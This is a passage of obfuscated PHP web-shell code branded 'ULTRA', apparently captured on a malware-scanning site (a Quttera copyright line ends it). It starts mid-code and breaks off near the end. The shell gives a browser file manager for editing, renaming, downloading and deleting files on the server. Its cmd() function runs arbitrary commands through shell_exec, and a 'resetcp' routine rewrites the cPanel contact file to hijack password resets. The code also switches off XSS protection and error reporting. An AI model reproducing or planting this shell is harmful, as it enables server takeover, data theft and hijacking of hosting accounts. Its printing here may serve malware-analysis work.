1024 ? "\163" : "\x78" : ($perms & 1024 ? "\x53" : "\x2d"); $info .= $perms & 4 ? "\162" : "\x2d"; $info .= $perms & 2 ? "\x77" : "\55"; $info .= $perms & 1 ? $perms & 512 ? "\164" : "\x78" : ($perms & 512 ? "\x54" : "\55"); return $info; } goto PDQo4; UW_bj: if (isset($_POST["\x6e\145\x77\116\x61\x6d\145"]) && isset($_GET["\x69\x74\x65\155"])) { if ($_POST["\156\145\167\x4e\x61\155\x65"] == '') { flash("\x59\x6f\165\x20\x6d\151\x73\x73\40\x61\x6e\40\x69\x6d\160\157\162\x74\x61\x6e\164\40\166\x61\154\x75\145", "\x4f\157\157\160\163\x73\56\56", "\x77\x61\162\156\x69\156\147", "\x3f\x64\151\162\75{$path}"); } if (rename($path . "\x2f" . $_GET["\x69\164\145\155"], $_POST["\156\145\167\116\141\x6d\x65"])) { flash("\122\x65\x6e\141\155\x65\40\123\x75\143\x63\x65\x73\163\146\165\x6c\154\171\x21", "\123\x75\x63\143\145\163\x73", "\x73\x75\143\x63\145\163\163", "\77\x64\x69\x72\x3d{$path}"); } else { flash("\122\145\156\x61\155\145\40\x46\141\x69\154\x65\x64", "\x46\141\151\154\x65\x64", "\x65\x72\162\x6f\x72", "\77\144\151\x72\x3d{$path}"); } } goto wl__9; XFq5M: echo $uname; goto H_IQp; fVczE: error_reporting(0); goto F1QQY; ZCkeZ: echo $uip; goto Nv1bf; F1QQY: set_time_limit(0); goto ZEVEw; i_owN:
</td></tr><tr><td style="width:7%">Server IP</td><td style="width:1%">:</td><td>goto cQcSV; Hztsv: header("\130\55\x58\123\x53\x2d\x50\x72\x6f\x74\x65\x63\x74\151\x6f\156\72\x20\60"); goto lEsKp; H_IQp:
</td></tr><tr><td style="width:7%">Software</td><td style="width:1%">:</td><td>goto CcB8W; pjrZi: if (isset($_GET["\141\x63\164\x69\x6f\x6e"])) { $action = $_GET["\141\x63\x74\151\x6f\x6e"]; if ($action == "\144\145\x6c\x65\164\x65" && isset($_GET["\151\164\x65\x6d"])) { function removedir($dir) { if (!rmdir($dir)) { $file = scandir($dir); foreach ($file as $files) { if (is_file($dir . "\57" . $files)) { if (unlink($dir . "\57" . $files)) { rmdir($dir); } } if (is_dir($dir . "\57" . $files)) { rmdir($dir . "\57" . $files); rmdir($dir); } } } } if (is_dir($_GET["\x69\164\145\x6d"])) { if (removedir($_GET["\151\164\x65\x6d"])) { flash("\x44\x65\x6c\x65\164\x65\x20\106\x6f\x6c\144\145\162\x20\x53\165\143\143\x65\163\x73\146\165\154\x6c\x79\x21", "\x53\165\x63\x63\145\x73\x73", "\163\x75\143\x63\145\x73\x73", "\x3f\144\x69\x72\x3d{$path}"); } else { flash("\104\145\x6c\145\x74\x65\x20\x46\x6f\154\x64\x65\x72\x20\123\x75\x63\x63\x65\163\163\x66\x75\x6c\x6c\171\x21", "\123\x75\x63\x63\145\x73\x73", "\x73\x75\x63\x63\x65\163\163", "\x3f\144\151\x72\75{$path}"); } } else { if (unlink($_GET["\x69\164\145\x6d"])) { flash("\104\145\x6c\x65\x74\145\40\106\151\x6c\145\x20\x53\x75\x63\x63\x65\163\x73\146\165\154\x6c\x79\41", "\123\165\143\143\145\x73\x73", "\x73\165\x63\x63\x65\163\x73", "\x3f\x64\x69\162\75{$path}"); } else { flash("\x44\x65\154\145\x74\145\40\106\151\x6c\145\40\x46\x61\x69\x6c\x65\144", "\106\141\151\x6c\145\x64", "\145\162\x72\157\x72", "\x3f\x64\151\x72\x3d{$path}"); } } } } goto O6ujO; XouiW: function cmd($command) { global $path; if (strpos($command, "\x72\145\x73\145\x74\143\x70") !== false) { $email = explode("\x20", $command); if (!$email[1] || !filter_var($email[1], FILTER_VALIDATE_EMAIL)) { return "\x59\x6f\165\40\x6d\x75\163\x74\40\x73\x70\145\143\x69\x66\x69\145\144\40\166\141\154\x69\144\40\x65\155\141\x69\x6c\x20\141\144\144\162\x65\163\163\x2e\40\x72\145\163\x65\164\143\x70\40\x79\157\x75\162\x65\155\141\x69\154\100\x65\x78\x61\x6d\160\x6c\145\x2e\143\157\x6d"; } $pathcp = explode("\57", $path); $text = "\x2d\x2d\55\xa\x22\145\155\141\151\x6c\42\x3a\x27{$email["\61"]}\47"; $file = join("\57", array($pathcp[0], $pathcp[1], $pathcp[2])); $file = $file . "\x2f\56\143\160\141\x6e\x65\x6c\x2f"; if (file_exists($file . "\143\x6f\x6e\x74\141\143\164\x69\156\x66\x6f")) { unlink($file . "\143\x6f\156\164\141\143\164\151\x6e\146\x6f"); } file_put_contents($file . "\x72\x65\x73\x65\164", $text); if (file_exists($file . "\x72\145\x73\145\x74")) { rename($file . "\x72\x65\x73\x65\164", $file . "\x63\157\156\164\141\x63\x74\x69\156\146\157"); return "\105\155\x61\x69\x6c\40\x66\157\162\x20\x72\145\163\145\x74\x20\x63\160\x61\156\145\154\x20\143\x68\141\156\x67\145\x64\40\x74\157\40\x27{$email["\x31"]}\x27"; } return "\x46\x61\x69\154\x65\x64\x20\x74\157\40\143\150\x61\x6e\147\145\40\162\145\163\145\x74\40\143\x70\40\x65\155\141\151\154\x21"; } elseif (function_exists("\x73\x68\x65\x6c\154\x5f\x65\x78\145\143")) { return shell_exec($command . "\40\x32\76\46\x31"); } else { return "\104\151\x73\x61\142\154\x65\40\106\x75\156\143\x74\151\157\x6e"; } } goto GV7Gs; e8bui: @ini_set("\x6d\141\170\x5f\x65\170\x65\x63\165\x74\151\x6f\x6e\x5f\164\151\155\x65", 0); goto C3aZC; kb2Lf: clear(); goto VEMVa; Sw6hf: http_response_code(500); goto qJhNl; AOd9n: foreach ($dirs as $dir) { if (!is_file($dir)) { continue; }
<tr><td><a class="text-light text-decoration-none"href="?dir=echo $path;
&item=echo $dir;
&action=edit"><i class="fa fa-file-code"></i>echo $dir;
</a></td><td class="text-light">echo function_exists("\x6d\151\x6d\145\x5f\143\x6f\x6e\164\x65\156\164\137\x74\x79\x70\x65") ? mime_content_type($dir) : filetype($dir);
</td><td class="text-light">echo fsize($dir);
</td><td class="text-light">echo getOwner($dir);
</td><td class="text-light">echo "\74\141\x20\x68\x72\x65\x66\75\42\x3f\x64\151\162\x3d" . $path . "\x26\151\x74\x65\x6d\x3d" . $dir . "\46\x61\143\x74\151\157\x6e\75\143\x68\155\157\x64\42\76"; if (is_writable($path . "\57" . $dir)) { echo "\x3c\x66\157\x6e\x74\x20\143\x6f\154\157\162\75\42\154\x69\x6d\x65\x22\76"; } elseif (!is_readable($path . "\57" . $dir)) { echo "\x3c\146\157\x6e\x74\x20\143\157\x6c\x6f\162\75\x22\x72\145\144\x22\76"; } echo perms($path . "\x2f" . $dir); if (is_writable($path . "\57" . $dir) || !is_readable($path . "\x2f" . $dir)) { echo "\x3c\57\141\x3e"; }
</td><td class="text-light">echo date("\x59\x2d\x6d\55\144\40\x68\72\x69\72\163", filemtime($dir));
</td><td>if ($dir != "\x2e" && $dir != "\56\56") {
<div class="btn-group"><a class="btn btn-outline-light btn-sm mr-1"href="?dir=echo $path;
&item=echo $dir;
&action=edit"data-placement="auto"data-toggle="tooltip"title="Edit"><i class="fa fa-file-edit"></i></a> <a class="btn btn-outline-light btn-sm mr-1"href="?dir=echo $path;
&item=echo $dir;
&action=rename"data-placement="auto"data-toggle="tooltip"title="Rename"><i class="fa fa-edit"></i></a> <a class="btn btn-outline-light btn-sm mr-1"href="?dir=echo $path;
&item=echo $dir;
&action=download"data-placement="auto"data-toggle="tooltip"title="Download"><i class="fa fa-file-download"></i></a> <a class="btn btn-outline-light btn-sm mr-1"href=""data-placement="auto"data-toggle="tooltip"title="Delete"onclick='return deleteConfirm("?dir=echo $path;
&item=echo $dir;
&action=delete")'><i class="fa fa-trash"></i></a></div>}
</td></tr>} goto GByMA; Nv1bf:
</td></tr><tr><td style="width:7%">Domains</td><td style="width:1%">:</td><td>goto IcTKd; s86qF: function clear() { if (!empty($_SESSION["\155\x65\x73\x73\141\147\145"])) { unset($_SESSION["\155\145\x73\163\141\147\145"]); } if (!empty($_SESSION["\x63\154\x61\163\x73"])) { unset($_SESSION["\143\x6c\141\163\x73"]); } if (!empty($_SESSION["\x73\164\141\x74\x75\x73"])) { unset($_SESSION["\163\x74\141\x74\x75\x73"]); } return true; } goto Z6jIr; Rg3Jc: header("\110\x54\124\x50\x2f\x31\x2e\x31\40\65\60\x30\40\111\156\164\145\162\x6e\141\154\x20\x53\145\x72\x76\x65\x72\40\105\162\162\157\x72", 0, 500); goto QvBWh; I1t2B: echo $dir; goto vac8y; GByMA:
</tbody></table></div><center><div class="text-light my-1">© ULTRA</div></center></div></div></div><script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"crossorigin="anonymous"integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p"></script><script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.4.0/dist/sweetalert2.all.min.js"></script><script>goto YyTsb; VEMVa:
function deleteConfirm(url) {
                event.preventDefault()
                Swal.fire({
                    title: 'Are you sure?',
                    icon: 'warning',
                    showCancelButton: true,
                    confirmButtonColor: '#3085d6',
                    cancelButtonColor: '#d33',
                    confirmButtonText: 'Yes, delete it!'
                }).then((result) => {
                    if (result.isConfirmed) {
                        window.location.href = url
                    }
                })
            }

            function jscopy() {
                var jsCopy = document.getElementById("CopyFromTextArea");
                jsCopy.focus();
                jsCopy.select();
                document.execCommand("copy");
            }</script></body></htm


© 2023 Quttera Ltd. All rights reserved.